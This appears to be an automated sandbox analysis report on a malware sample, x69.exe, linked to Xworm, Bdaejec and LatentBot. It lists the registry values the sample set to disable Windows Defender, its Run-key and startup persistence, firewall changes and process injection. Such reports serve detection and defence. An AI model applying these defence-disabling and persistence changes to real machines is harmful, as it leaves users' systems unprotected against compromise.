Analysis Overview
SHA256
1ca064f8c8eb72cd0cfda466bb582318c93d2856a89bcf323b37d820f05fdc83
Threat Level: Known bad
The file x69.exe was found to be: Known bad.
Malicious Activity Summary
Gurcu, WhiteSnake
Suspicious use of NtCreateUserProcessOtherParentProcess
LatentBot
Bdaejec
Detect Xworm Payload
Contains code to disable Windows Defender
Xworm family
Modifies Windows Defender Real-time Protection settings
Modifies Windows Defender DisableAntiSpyware settings
Xworm
Gurcu family
Modifies security service
Detects Bdaejec Backdoor.
Bdaejec family
Latentbot family
Command and Scripting Interpreter: PowerShell
Modifies Windows Firewall
Command and Scripting Interpreter: PowerShell
Reads user/profile data of web browsers
Drops startup file
Checks BIOS information in registry
Executes dropped EXE
Checks computer location settings
ASPack v2.12-2.42
Indicator Removal: Clear Windows Event Logs
Modifies Security services
Checks whether UAC is enabled
Looks up external IP address via web service
Adds Run key to start application
Drops file in System32 directory
Suspicious use of SetThreadContext
Drops file in Program Files directory
Drops file in Windows directory
Unsigned PE
Event Triggered Execution: Netsh Helper DLL
Enumerates physical storage devices
System Location Discovery: System Language Discovery
Scheduled Task/Job: Scheduled Task
NTFS ADS
Suspicious use of FindShellTrayWindow
Uses Task Scheduler COM API
Uses Volume Shadow Copy WMI provider
Enumerates system info in registry
Suspicious use of UnmapMainImage
Uses Volume Shadow Copy service COM API
Suspicious use of SendNotifyMessage
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: AddClipboardFormatListener
Modifies Internet Explorer settings
Suspicious use of WriteProcessMemory
Checks SCSI registry key(s)
Modifies Control Panel
Modifies registry class
Modifies data under HKEY_USERS
Suspicious use of SetWindowsHookEx
Checks processor information in registry
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: GetForegroundWindowSpam
MITRE ATT&CK
Analysis: static1
Detonation Overview
Reported
2025-05-20 04:12
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2025-05-20 04:12
Reported
2025-05-20 04:14
Platform
win10v2004-20250502-en
Max time kernel
150s
Max time network
150s
Command Line
Signatures
Bdaejec
Bdaejec family
Contains code to disable Windows Defender
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detects Bdaejec Backdoor.
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
LatentBot
Latentbot family
Modifies Windows Defender DisableAntiSpyware settings
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" | C:\Windows\system32\reg.exe | N/A |
Modifies Windows Defender Real-time Protection settings
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | C:\Windows\system32\reg.exe | N/A |
Modifies security service
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" | C:\Windows\system32\reg.exe | N/A |
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 4192 created 616 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\system32\winlogon.exe |
| PID 4348 created 616 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\system32\winlogon.exe |
Xworm
Xworm family
Command and Scripting Interpreter: PowerShell
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
ASPack v2.12-2.42
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\x69.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\iyMbXS.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\x69.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x69.lnk | C:\Users\Admin\AppData\Roaming\x69.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x69.lnk | C:\Users\Admin\AppData\Roaming\x69.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\x69.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\x69.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\x69install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\iyMbXS.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\x69install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\x69.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\x69.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\x69 = "C:\\Users\\Admin\\AppData\\Roaming\\x69.exe" | C:\Users\Admin\AppData\Roaming\x69.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\x69 = "C:\\Users\\Admin\\AppData\\Roaming\\x69.exe" | C:\Users\Admin\AppData\Local\Temp\x69.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\x69Disable-winDefender = "C:\\Users\\Admin\\AppData\\Roaming\\x69Disable-winDefender.exe" | C:\Users\Admin\AppData\Local\Temp\x69.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\x69install = "C:\\Users\\Admin\\AppData\\Roaming\\x69install.exe" | C:\Users\Admin\AppData\Local\Temp\x69.exe | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Modifies Security services
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdFilter\Start = "4" | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdNisDrv\Start = "4" | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdNisSvc\Start = "4" | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdBoot\Start = "4" | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdFilter\Start = "4" | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdNisDrv\Start = "4" | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdNisSvc\Start = "4" | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdBoot\Start = "4" | C:\Windows\system32\reg.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File opened for modification | C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 | C:\Windows\system32\svchost.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File opened for modification | C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 4192 set thread context of 6124 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\System32\dllhost.exe |
| PID 4348 set thread context of 2636 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\System32\dllhost.exe |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files\Java\jdk-1.8\bin\java-rmi.exe | C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\jre\bin\ssvagent.exe | C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\Common.DBConnection.exe | C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\onenoteshare.exe | C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroLayoutRecognizer\AcroLayoutRecognizer.exe | C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\bin\wsgen.exe | C:\Users\Admin\AppData\Local\Temp\iyMbXS.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_4.4.8204.0_x64__8wekyb3d8bbwe\Microsoft.MicrosoftSolitaireCollection.exe | C:\Users\Admin\AppData\Local\Temp\iyMbXS.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Mail\wab.exe | C:\Users\Admin\AppData\Local\Temp\iyMbXS.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Uninstall.exe | C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\bin\jmap.exe | C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\bin\wsgen.exe | C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\jre\bin\jp2launcher.exe | C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Integration\Addons\OneDriveSetup.exe | C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\GRAPH.EXE | C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.MixedReality.Portal_2000.19081.1301.0_x64__8wekyb3d8bbwe\MixedRealityPortal.exe | C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE | C:\Users\Admin\AppData\Local\Temp\iyMbXS.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\bin\klist.exe | C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\bin\javaw.exe | C:\Users\Admin\AppData\Local\Temp\iyMbXS.exe | N/A |
| File opened for modification | C:\Program Files\Mozilla Firefox\private_browsing.exe | C:\Users\Admin\AppData\Local\Temp\iyMbXS.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.MSPaint_6.1907.29027.0_x64__8wekyb3d8bbwe\PaintStudio.View.exe | C:\Users\Admin\AppData\Local\Temp\iyMbXS.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\jre\bin\javaws.exe | C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre-1.8\bin\keytool.exe | C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Client\AppVDllSurrogate64.exe | C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Integration\Integrator.exe | C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\misc.exe | C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\Common.DBConnection.exe | C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe | N/A |
| File opened for modification | C:\Program Files\Mozilla Firefox\pingsender.exe | C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.MSPaint_6.1907.29027.0_x64__8wekyb3d8bbwe\PaintStudio.View.exe | C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\7z.exe | C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre-1.8\bin\tnameserv.exe | C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\bin\ktab.exe | C:\Users\Admin\AppData\Local\Temp\iyMbXS.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\MSOICONS.EXE | C:\Users\Admin\AppData\Local\Temp\iyMbXS.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe | C:\Users\Admin\AppData\Local\Temp\iyMbXS.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre-1.8\bin\ssvagent.exe | C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\AppInstallerPythonRedirector.exe | C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32Info.exe | C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\bin\idlj.exe | C:\Users\Admin\AppData\Local\Temp\iyMbXS.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\bin\jjs.exe | C:\Users\Admin\AppData\Local\Temp\iyMbXS.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre-1.8\bin\kinit.exe | C:\Users\Admin\AppData\Local\Temp\iyMbXS.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.People_10.1902.633.0_x64__8wekyb3d8bbwe\PeopleApp.exe | C:\Users\Admin\AppData\Local\Temp\iyMbXS.exe | N/A |
| File opened for modification | C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.27\createdump.exe | C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\133.0.6943.60\Installer\setup.exe | C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.XboxApp_48.49.31001.0_x64__8wekyb3d8bbwe\XboxApp.exe | C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32Info.exe | C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\133.0.6943.60\Installer\chrmstp.exe | C:\Users\Admin\AppData\Local\Temp\iyMbXS.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\MSOSREC.EXE | C:\Users\Admin\AppData\Local\Temp\iyMbXS.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\bin\appletviewer.exe | C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\bin\javac.exe | C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\jre\bin\jp2launcher.exe | C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\jre\bin\keytool.exe | C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\jre\bin\kinit.exe | C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre-1.8\bin\klist.exe | C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\Office16\OSPPREARM.EXE | C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\PDFREFLOW.EXE | C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\bin\servertool.exe | C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\jre\bin\javaw.exe | C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\jre\bin\tnameserv.exe | C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE | C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\MSOSREC.EXE | C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\filecompare.exe | C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\WORDICON.EXE | C:\Users\Admin\AppData\Local\Temp\iyMbXS.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\bin\jarsigner.exe | C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre-1.8\bin\jabswitch.exe | C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre-1.8\bin\jp2launcher.exe | C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe | N/A |
Enumerates physical storage devices
Event Triggered Execution: Netsh Helper DLL
| Description | Indicator | Process | Target |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\x69install.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\x69install.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\iyMbXS.exe | N/A |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Service | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\CompatibleIDs | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\CompatibleIDs | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
